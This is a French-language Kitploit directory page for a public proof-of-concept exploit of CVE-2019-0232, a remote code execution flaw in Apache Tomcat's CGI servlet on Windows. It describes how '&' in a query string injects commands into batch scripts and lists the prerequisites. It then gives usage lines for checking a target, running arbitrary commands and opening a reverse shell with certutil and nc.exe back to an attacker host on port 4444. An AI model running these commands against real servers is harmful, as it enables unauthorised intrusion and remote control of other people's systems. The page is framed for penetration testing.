Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC | Kitploit
Outils/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC

Voir le dépôt
112il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Injection de script batch Windows via les arguments de la chaîne de requête

Description

Apache Tomcat avec le servlet CGI activé et enableCmdLineArguments=true transmet les paramètres de la chaîne de requête comme arguments de ligne de commande aux scripts CGI. Sous Windows, les fichiers batch (.bat/.cmd) interprètent & comme un séparateur de commandes, permettant l'exécution arbitraire de commandes via une URL malveillante.

Prérequis

  • Servlet CGI activé dans conf/web.xml ou WEB-INF/web.xml
  • enableCmdLineArguments=true dans les paramètres d'initialisation du servlet CGI
  • Un script CGI (par ex. ism.bat) déployé et accessible
  • Cible Windows (les fichiers batch sont nécessaires pour l'injection via &)
  • Utilisation

    root@kitploit:~
    git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
    cd CVE-2019-0232
    pip install -r requirements.txt
    

    Vérifier si le point de terminaison CGI existe :

    root@kitploit:~
    python cve-2019-0232.py check -t http://target:8080
    python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
    

    Exécuter une commande :

    root@kitploit:~
    python cve-2019-0232.py exec -t http://target:8080 -c whoami
    python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
    

    Reverse shell (2 étapes certutil + nc.exe) :

    root@kitploit:~
    python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444
    

    Dépendances

    • Python 3.8+
    • requests
    • Cible Windows (la vulnérabilité est spécifique au système d'exploitation)
    Télécharger l’outil